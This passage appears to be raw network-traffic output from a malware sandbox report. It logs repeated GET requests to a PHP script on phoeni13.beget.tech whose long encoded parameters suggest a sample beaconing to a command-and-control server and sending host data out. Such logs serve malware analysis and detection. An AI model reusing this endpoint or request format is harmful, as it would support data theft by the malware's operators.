VYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJFTQq90dBp2T0UkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJpXQq9UNRp2TxUkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJNTRq9kMFp2TwEkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EM